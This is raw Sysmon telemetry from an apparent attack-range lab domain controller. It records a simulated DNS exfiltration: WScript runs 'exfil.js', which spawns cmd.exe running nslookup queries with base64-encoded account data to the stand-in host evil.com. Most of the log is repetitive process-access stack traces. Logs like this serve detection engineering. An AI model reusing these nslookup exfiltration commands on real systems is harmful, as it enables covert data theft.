14:21:25.670{2E1864BB-18E5-629A-BB42-000000005F02}6440988C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-BD42-000000005F02}6580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.670{2E1864BB-18E5-629A-BD42-000000005F02}6580C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-BB42-000000005F02}6440C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwtch.tmp 2>&1 10341000x8000000000000000206702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.650{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-BC42-000000005F02}1384C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.650{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-BC42-000000005F02}1384C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.634{2E1864BB-18E5-629A-BC42-000000005F02}13847284C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-BB42-000000005F02}6440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000206699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.634{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18F77EDDD843F0319A9EC27FFAADFB24,SHA256=8D34F8222FFB1C7F21D15A4D75AE2D1AE6E8FE571BA4B55B9D9F748ADC4D96BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.634{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-BC42-000000005F02}1384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.619{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.619{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.619{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.619{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.619{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-BB42-000000005F02}6440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.619{2E1864BB-18E0-629A-6742-000000005F02}39767568C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-BB42-000000005F02}6440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.629{2E1864BB-18E5-629A-BB42-000000005F02}6440C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwtch.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.619{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlowdo.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.603{2E1864BB-18E5-629A-B942-000000005F02}9247904C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-BA42-000000005F02}508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.603{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.603{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.603{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-BA42-000000005F02}508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.603{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.603{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.603{2E1864BB-18E5-629A-B842-000000005F02}74645432C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-BA42-000000005F02}508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.605{2E1864BB-18E5-629A-BA42-000000005F02}508C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-B842-000000005F02}7464C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlowdo.tmp 2>&1 10341000x8000000000000000206681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.587{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-B942-000000005F02}924C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.587{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-B942-000000005F02}924C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.572{2E1864BB-18E5-629A-B942-000000005F02}9247904C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-B842-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.572{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B942-000000005F02}924C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.565{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B842-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 